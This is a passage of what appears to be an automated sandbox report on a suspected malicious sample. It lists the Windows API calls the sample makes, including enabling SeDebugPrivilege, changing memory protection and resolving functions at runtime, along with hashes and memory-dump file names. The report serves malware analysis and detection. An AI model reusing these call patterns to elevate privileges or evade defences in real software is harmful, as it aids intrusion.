                                                                  • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,?,?,?,004051B3), ref: 004047B3
                                                                  • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,004051B3), ref: 004047B6
                                                                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 004047CD
                                                                  • AdjustTokenPrivileges.ADVAPI32 ref: 00404810
                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,004051B3), ref: 0040482C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: Process$CurrentToken$AdjustCloseHandleLookupOpenPrivilegePrivilegesValue
                                                                  • String ID: SeDebugPrivilege
                                                                  • API String ID: 3621747604-2896544425
                                                                  • Opcode ID: 0b374022394a715b8987bc5ef204c25a5dec9ab52c03f500be3cd1fab7d0c95c
                                                                  • Instruction ID: 052f3df82ca70502255671040b2a31584c8238dd5ceadda2b5f1d62a07713268
                                                                  • Opcode Fuzzy Hash: 0b374022394a715b8987bc5ef204c25a5dec9ab52c03f500be3cd1fab7d0c95c
                                                                  • Instruction Fuzzy Hash: ED01C475608340AFE310DF65DC49B9B7BE4BB88700F40682CF28497291C7B49505CB6A
                                                                  APIs
                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,?,00000001), ref: 0040418C
                                                                  • ReleaseMutex.KERNEL32(?,?,?,?,?), ref: 0040426D
                                                                  • ReleaseMutex.KERNEL32(?), ref: 004042A5
                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404498
                                                                  • ReleaseMutex.KERNEL32(00000000,?,?,00000000,?,000000FF), ref: 004044F1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: MutexRelease$ObjectSingleWait
                                                                  • String ID:
                                                                  • API String ID: 257779224-0
                                                                  • Opcode ID: 8f655228cdc90f06d313c78c90473a3e5cbcebb0cb1dc3bdbce8e6e6bec819a1
                                                                  • Instruction ID: 8c9ce78122583aa8a55ee52179d80f89be94f9b8b227595c5774061f7ec44eb9
                                                                  • Opcode Fuzzy Hash: 8f655228cdc90f06d313c78c90473a3e5cbcebb0cb1dc3bdbce8e6e6bec819a1
                                                                  • Instruction Fuzzy Hash: 50C190751083809FD320CF29D885B9BBBE4AFD9304F10492EF599873A2CB78A509CB56
                                                                  APIs
                                                                  • VirtualQuery.KERNEL32(?,?,0000001C), ref: 00429F5E
                                                                  • GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 00429F6F
                                                                  • VirtualQuery.KERNEL32(?,?,0000001C,?,?,0000001C), ref: 00429FB5
                                                                  • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,0000001C), ref: 00429FF3
                                                                  • VirtualProtect.KERNEL32(?,?,00000002,?,?,?,0000001C), ref: 0042A019
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: Virtual$Query$AllocInfoProtectSystem
                                                                  • String ID:
                                                                  • API String ID: 4136887677-0
                                                                  • Opcode ID: c67923648d0627a3e019e3e4bfa5385d88bc288047f0f5f504da8e189111f8be
                                                                  • Instruction ID: eda20bf0d75a8237f75d833b080248ab74fea35a03fb107c59d71fc75ff335a4
                                                                  • Opcode Fuzzy Hash: c67923648d0627a3e019e3e4bfa5385d88bc288047f0f5f504da8e189111f8be
                                                                  • Instruction Fuzzy Hash: 6C31A032F00229ABDF108FA4EE45EEE7B78EB04315F550076E901E3290D7759E41DBA9
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: CountTick
                                                                  • String ID:
                                                                  • API String ID: 536389180-0
                                                                  • Opcode ID: 6c9193b7122c9ada05db2bf893685bdb1e040ed9adec1d3d207f007b4c2f18bb
                                                                  • Instruction ID: 8ac1f8066ba04423f4662e4113d208e2f1450d097528ad0d5c8686e1bb647505
                                                                  • Opcode Fuzzy Hash: 6c9193b7122c9ada05db2bf893685bdb1e040ed9adec1d3d207f007b4c2f18bb
                                                                  • Instruction Fuzzy Hash: 56F0A9319283B19F9704EF39C94518BBBE5EBC4250F54CD2EA895C3214E378D915DF92
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1dbbee3704f12433d065c0b315258c4b07da05294b99e7abcb0b3c4fa3fe7de6
                                                                  • Instruction ID: 8b5a2351a7d1e8d8b8448e22e26b40c83a0be625b2b6ea0dbd06899092a7e69e
                                                                  • Opcode Fuzzy Hash: 1dbbee3704f12433d065c0b315258c4b07da05294b99e7abcb0b3c4fa3fe7de6
                                                                  • Instruction Fuzzy Hash: 74A16E762043808FE314CF35EC927967BE6ABA9700F14652EE995873B1D3F78448CB59
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: MutexObjectReleaseSingleWaitlstrlen
                                                                  • String ID: M$M
                                                                  • API String ID: 2109015423-2122717962
                                                                  • Opcode ID: 7911a5574d635876bba3228f93589202df659d67aa1a0e78d2affb198733790a
                                                                  • Instruction ID: 65662130b59962f93e7e6451055683d101b0e1da79cd26758f1cd863abbc9b8b
                                                                  • Opcode Fuzzy Hash: 7911a5574d635876bba3228f93589202df659d67aa1a0e78d2affb198733790a
                                                                  • Instruction Fuzzy Hash: 9A12F4B15083408FD704DF24D891AEBBBE9EF99304F04596EF885873A2C775D885CB9A
                                                                  APIs
                                                                  • GetLocaleInfoA.KERNEL32(?,00001004,00000100,00000006,00000100,?,00000000), ref: 0042C8D2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: InfoLocale
                                                                  • String ID:
                                                                  • API String ID: 2299586839-0
                                                                  • Opcode ID: d9c418d2c5127a8e192e8e4372b48e11d0a1081b729fc00d09ab3506c0033e68
                                                                  • Instruction ID: e4f55cae686a28aa76e175452713597d1e28f11c85c6f89cf701b194585c12d8
                                                                  • Opcode Fuzzy Hash: d9c418d2c5127a8e192e8e4372b48e11d0a1081b729fc00d09ab3506c0033e68
                                                                  • Instruction Fuzzy Hash: 0AE02230B00208EBDB00EBB1EC42ADD37B8AB08318F8041A6F100D61D1DB70D600C71D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 8
                                                                  • API String ID: 0-4194326291
                                                                  • Opcode ID: 814331b60dd9f30dc3f595824217278f4f2d009bcc9f76483a00ba86c43ce653
                                                                  • Instruction ID: 26635683ad8bc6e3c89de0789139caf88a326a2f6bde127323b4d45711ec2293
                                                                  • Opcode Fuzzy Hash: 814331b60dd9f30dc3f595824217278f4f2d009bcc9f76483a00ba86c43ce653
                                                                  • Instruction Fuzzy Hash: 239136701083914BD710CE2895907AFBBE1ABD6300F45593EE8D26B392D27CD95A8B4B
                                                                  APIs
                                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_000272CC), ref: 0042731F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionFilterUnhandled
                                                                  • String ID:
                                                                  • API String ID: 3192549508-0
                                                                  • Opcode ID: c295cc2e9cb841625434bd69c2be57921d73015333ff570b30f8570a734b9d5d
                                                                  • Instruction ID: 91d239ce8c3ec9bc864000ee122172ece4c8541e5da3e4e88b6e0ad87dd54bef
                                                                  • Opcode Fuzzy Hash: c295cc2e9cb841625434bd69c2be57921d73015333ff570b30f8570a734b9d5d
                                                                  • Instruction Fuzzy Hash: 74A012743022008BD3149F306E0501039A09E002013411075E500C1230D7700004D519
                                                                  APIs
                                                                  • SetUnhandledExceptionFilter.KERNEL32 ref: 00427333
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionFilterUnhandled
                                                                  • String ID:
                                                                  • API String ID: 3192549508-0
                                                                  • Opcode ID: 2ab6f6718f042291c8c0e3391e57a3836615d8269b254a55ffda52550e9e3c4b
                                                                  • Instruction ID: 8169098ac00662e5d218563eb379ef12e921e05fa147c2ad6ec4e4497947ff53
                                                                  • Opcode Fuzzy Hash: 2ab6f6718f042291c8c0e3391e57a3836615d8269b254a55ffda52550e9e3c4b
                                                                  • Instruction Fuzzy Hash:
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: CountTick
                                                                  • String ID: %c%c%c%c%c
                                                                  • API String ID: 536389180-1277064353
                                                                  • Opcode ID: daa91acc0e97e6ab900b670a7356a182af056bc5419cf5b0c7a93d0f2983e8bb
                                                                  • Instruction ID: 4dc9e3df276925cb3a034685040d612f820b75638e41f6e52d904118c8461c86
                                                                  • Opcode Fuzzy Hash: daa91acc0e97e6ab900b670a7356a182af056bc5419cf5b0c7a93d0f2983e8bb
                                                                  • Instruction Fuzzy Hash: CD5105706083409BD304EB26C9C2B9FB6E7AFC9714F04CA3FB159672D1DABC94448B5A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4374541c7480c9de861eca13ad143b888a03e34fd4b500e75caf825a3247e9c9
                                                                  • Instruction ID: 3cdbe674e5470716266b0416ac65ed08902d21a00894794e9fc3ed7962c02048
                                                                  • Opcode Fuzzy Hash: 4374541c7480c9de861eca13ad143b888a03e34fd4b500e75caf825a3247e9c9
                                                                  • Instruction Fuzzy Hash: F721D632A00614DFCB14DF69D8809ABB7A5FF45310B8A80A9E915CB286E734F915CBF0
                                                                  APIs
                                                                  • GetProcAddress.KERNEL32(00000000,0000006B), ref: 0041D4A3
                                                                  • LoadLibraryA.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000007,?,00000001), ref: 0041D53F
                                                                  • GetProcAddress.KERNEL32(00000000,0000009A), ref: 0041D637
                                                                  • GetProcAddress.KERNEL32(00000000,000000A5), ref: 0041D6A1
                                                                  • GetProcAddress.KERNEL32(00000000,000000EA), ref: 0041D718
                                                                  • GetProcAddress.KERNEL32(00000000,00000088), ref: 0041D80A
                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0041D967
                                                                  • LoadLibraryA.KERNEL32(00000040), ref: 0041D9FF
                                                                  • GetProcAddress.KERNEL32(00000000,0000008A), ref: 0041DA87
                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0041DB60
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$LibraryLoad
                                                                  • String ID: $$$$$$&$&$+$/$1$1$2$6$6$7$8$9$9$:$;$<$<$>$@$A$B$H$H$H$I$I$I$J$J$L$L$L$M$M$N$S$S$S$S$T$T$W$W$X$X$_$`$`$`$`$e$g$g$g$h$h$i$l$m$o$p$q$r$t$t$u$v$w$w$x$x$y$|$~
                                                                  • API String ID: 2238633743-3939626055
